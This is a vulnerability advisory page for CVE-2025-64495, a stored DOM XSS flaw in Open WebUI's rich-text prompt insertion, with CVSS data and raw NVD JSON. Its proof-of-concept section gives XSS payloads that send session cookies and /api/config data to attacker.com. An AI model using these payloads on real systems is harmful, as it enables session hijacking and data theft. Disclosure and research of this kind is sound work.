Security Vulnerability Report
中文
CVE-2025-64495 CVSS 8.7 HIGH

CVE-2025-64495

Published: 2025-11-08 02:15:35
Last Modified: 2025-11-26 15:36:59
Source: [email protected]

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. In versions 0.6.34 and below, the functionality that inserts custom prompts into the chat window is vulnerable to DOM XSS when 'Insert Prompt as Rich Text' is enabled, since the prompt body is assigned to the DOM sink .innerHtml without sanitisation. Any user with permissions to create prompts can abuse this to plant a payload that could be triggered by other users if they run the corresponding / command to insert the prompt. This issue is fixed in version 0.6.35.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:* - VULNERABLE
Open WebUI <= 0.6.34

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-64495 DOM XSS PoC for Open WebUI // Steps to reproduce: // 1. Create a new prompt with malicious content // 2. Enable 'Insert Prompt as Rich Text' setting // 3. Another user inserts the prompt via /command // 4. XSS payload executes in victim's browser // Malicious prompt content (insert as Rich Text): const maliciousPayload = ` <img src=x onerror=" // Steal session cookies fetch('https://attacker.com/steal?cookie=' + btoa(document.cookie)); // Or execute more complex JavaScript fetch('/api/config').then(r=>r.json()).then(data=>{ fetch('https://attacker.com/exfil?data=' + btoa(JSON.stringify(data))); }); "> `; // Alternative payload using script tag: const scriptPayload = `<script> // Cookie theft document.location='https://attacker.com/log?c='+document.cookie; </script>`; // Alternative payload using event handlers: const eventPayload = `<body onload="fetch('https://attacker.com/pwned')">`; // Exploitation scenario: // 1. Attacker with prompt creation permission creates prompt with above payload // 2. Victim views chat and uses /insert <prompt_name> command // 3. innerHTML renders the payload without sanitization // 4. JavaScript executes in victim's session context

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64495", "sourceIdentifier": "[email protected]", "published": "2025-11-08T02:15:35.250", "lastModified": "2025-11-26T15:36:59.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. In versions 0.6.34 and below, the functionality that inserts custom prompts into the chat window is vulnerable to DOM XSS when 'Insert Prompt as Rich Text' is enabled, since the prompt body is assigned to the DOM sink .innerHtml without sanitisation. Any user with permissions to create prompts can abuse this to plant a payload that could be triggered by other users if they run the corresponding / command to insert the prompt. This issue is fixed in version 0.6.35."}, {"lang": "es", "value": "Open WebUI es una plataforma de inteligencia artificial autoalojada diseñada para operar completamente sin conexión. En las versiones 0.6.34 e inferiores, la funcionalidad que inserta prompts personalizados en la ventana de chat es vulnerable a XSS DOM cuando 'Insertar Prompt como Texto Enriquecido' está habilitado, ya que el cuerpo del prompt se asigna al sink DOM .innerHtml sin sanitización. Cualquier usuario con permisos para crear prompts puede abusar de esto para insertar una carga útil que podría ser activada por otros usuarios si ejecutan el comando / correspondiente para insertar el prompt. Este problema se corrige en la versión 0.6.35."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.6.35", "matchCriteriaId": "E8274E63-8712-4A92-9161-E5D5EC241CD4"}]}]}], "references": [{"url": "https://github.com/open-webui/open-webui/blob/7a83e7dfa367d19f762ec17cac5e4a94ea2bd97d/src/lib/components/common/RichTextInput.svelte#L348", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/open-webui/open-webui/commit/eb9c4c0e358c274aea35f21c2856c0a20051e5f1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-w7xj-8fx7-wfch", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.